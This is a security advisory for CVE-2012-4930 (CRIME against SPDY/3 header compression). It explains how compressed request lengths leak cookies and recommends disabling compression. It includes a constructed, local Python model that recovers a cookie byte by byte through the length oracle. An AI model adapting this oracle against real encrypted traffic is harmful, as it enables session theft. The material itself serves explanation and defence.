PT-2012-5665 · Google · Spdy

Tomas Hoger

·

Published

2012-09-15

·

Updated

2024-03-12

·

CVE-2012-4930

CVSS v2.0

2.6

Low

Vector

AV:N/AC:H/Au:N/C:P/I:N/A:N

Name of the Vulnerable Software and Affected Versions

SPDY protocol versions 3 and earlier

Description

SPDY versions 3 and earlier compress the HTTP header block with zlib (DEFLATE) before the stream is encrypted by TLS, and TLS does not hide the length of what it encrypts. A man-in-the-middle who can also make the victim's browser send requests containing attacker-chosen bytes (for example through script on a page the victim visits) can therefore watch how much each encrypted request shrinks: when a guessed string in the request matches part of a secret header value the browser adds automatically, such as a session cookie, DEFLATE encodes it as a back-reference and the record gets shorter. Repeating the guess one byte at a time recovers the plaintext header. This is known as the "CRIME" attack. The root cause is that attacker-controlled and secret data share one compression context and the length of the compressed, unencrypted data is not obfuscated.

Recommendations

For SPDY protocol versions 3 and earlier, disable SPDY header compression (or SPDY altogether) on clients and servers until a fix that stops length leakage is deployed. The mitigation is to remove the compression, not TLS: the attack needs both compression of mixed secret and attacker data and the length that TLS leaks, and with compression off every guess produces the same length and the oracle disappears.
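The length oracle described above, modelled in Python against zlib. This is an added example, not code from the advisory, from Google, or from the SPDY implementations; the header layout, the host bank.example, the cookie value and the attacker's query parameter are all constructed. The model uses the same mechanism as CRIME: the attacker chooses the path, the browser appends the cookie, the block is zlib-compressed, and the attacker learns only the compressed length.

```python
"""Constructed model of the CRIME length oracle against SPDY/3 header compression."""
import zlib

# Constructed victim state. The attacker never reads this directly; it is only
# passed around so the simulated browser can build the request.
VICTIM_COOKIE = "sessionid=7f3a9c2e1b"
HEX = "0123456789abcdef"
# Number of already-known bytes repeated in front of each guess. Six keeps the
# LZ77 match in the 3..10 length range, where fixed-Huffman length codes carry
# no extra bits, so a correct guess removes exactly one 8-bit literal and the
# compressed output is always exactly one byte shorter (see usage note).
WINDOW = 6


def header_block(path: str, cookie: str) -> bytes:
    """Model of a SPDY/3 request header block (constructed layout): the attacker
    controls the path, the browser appends its cookie for the target host."""
    return (
        f":method: GET\n:path: {path}\n:host: bank.example\n"
        f"cookie: {cookie}\n"
    ).encode()


def observed_length(path: str, cookie: str, compressed: bool = True) -> int:
    """Length visible to an on-path attacker: the header block after SPDY's
    zlib compression (level 9) and before TLS, which only adds a constant."""
    block = header_block(path, cookie)
    return len(zlib.compress(block, 9)) if compressed else len(block)


def recover(cookie: str, known: str, charset: str = HEX, max_len: int = 32,
            compressed: bool = True) -> str:
    """Recover the cookie value byte by byte using only observed_length().

    `known` is the part the attacker already has (here the cookie name and
    '='). Each round sends one request per candidate byte with the last WINDOW
    known bytes plus the candidate in the path; the unique shortest response
    reveals the next byte. When every candidate yields the same length there
    is nothing left to learn: the end of the value, or no compression at all.
    """
    for _ in range(max_len):
        context = known[-WINDOW:]
        lengths = {c: observed_length(f"/?q={context}{c}", cookie, compressed)
                   for c in charset}
        best = min(lengths.values())
        winners = [c for c, n in lengths.items() if n == best]
        if len(winners) != 1:
            break
        known += winners[0]
    return known


if __name__ == "__main__":
    print("compressed:  ", recover(VICTIM_COOKIE, "sessionid="))
    print("uncompressed:", recover(VICTIM_COOKIE, "sessionid=", compressed=False))
```

With header compression on, `recover` walks the whole value; with compression off (the mitigation above), all sixteen candidates compress to the same length in the first round and the attacker learns nothing beyond the prefix. The sliding window of six known bytes is what makes this toy oracle noise-free: a correct guess extends a 6-byte match to 7 bytes, which in a fixed-Huffman DEFLATE block costs the same 7-bit length code, so the only difference is one dropped literal, exactly 8 bits. Real header blocks are larger, zlib then emits dynamic Huffman tables whose sizes shift with every candidate, and a 7-bit saving can round away at a byte boundary, which is why the published attack needs padding and repeated tries where this model does not.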


Related Identifiers

CVE-2012-4930
ROSA-SA-2024-2371

Affected Products

Spdy